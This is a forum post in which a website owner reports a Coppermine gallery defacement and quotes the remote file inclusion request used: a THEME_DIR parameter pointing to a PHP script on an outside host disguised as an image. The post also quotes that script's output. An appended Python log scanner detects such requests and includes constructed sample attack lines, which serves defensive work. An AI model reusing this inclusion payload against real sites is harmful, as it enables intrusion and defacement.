hey,
I run a website, www.dustify.net. Last night someone used Coppermine to execute a PHP script to deface the front page of the website by accessing the PostNuke username/password.
"http://www.dustify.net/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.webfontes.com.br/priv8/cmd.gif?&nick=MaMa&op=coppermine"
is the request that was put through our webserver. The error is in "http://www.dustify.net/modules/coppermine/themes/default/theme.php" and the file "http://www.webfontes.com.br/priv8/cmd.gif" is not an image, it contains PHP code to break into several security flaws in several image galleries.
The result of executing the script is:
"Possível Login cPanel: **** Possível Senha: ****
Admins:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in http://www.webfontes.com.br/priv8/cmd.gif?/user_list_info_box.inc on line 251
Site Ownado!"
Has anyone else had this problem?
Sorry, but: http://forum.coppermine-gallery.net/index.php?topic=2553.0
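A defender-side check for the request pattern quoted in the first post, as an added example that is not part of the original thread: it scans web-server access logs for query parameters (such as `THEME_DIR`) whose value is an absolute URL on a host other than your own. The log lines, host names, the `/gallery/view.php` path and the `own_hosts` parameter are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (Common Log Format); all hosts are placeholders.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2005:02:14:09 +0000] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://files.example.net/cmd.gif?&nick=x&op=coppermine HTTP/1.1" 200 512
198.51.100.4 - - [12/Mar/2005:02:15:40 +0000] "GET /index.php?module=coppermine&album=3 HTTP/1.1" 200 8841
198.51.100.9 - - [12/Mar/2005:02:16:02 +0000] "GET /redirect.php?to=http://www.gallery.example/about HTTP/1.1" 302 0
192.0.2.55 - - [12/Mar/2005:02:17:31 +0000] "GET /gallery/view.php?tpl=ftp%3A%2F%2Ffiles.example.net%2Fx.txt HTTP/1.1" 200 77
"""

# client IP, method, request target, status code
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def find_remote_include_attempts(log_text, own_hosts):
    """Return (client_ip, path, param, value, status) for every query parameter
    whose decoded value is an absolute URL on a host outside own_hosts."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        ip, _method, target, status = m.groups()
        parts = urlsplit(target)
        # parse_qsl percent-decodes values, so encoded URLs are caught too
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if not value.lower().startswith(REMOTE_SCHEMES):
                continue
            host = (urlsplit(value).hostname or "").lower()
            if host not in own_hosts:
                hits.append((ip, parts.path, name, value, int(status)))
    return hits


if __name__ == "__main__":
    for hit in find_remote_include_attempts(SAMPLE_LOG, {"www.gallery.example"}):
        print(hit)
```

A hit that was answered with status 200 deserves priority in triage, since the script was served rather than rejected.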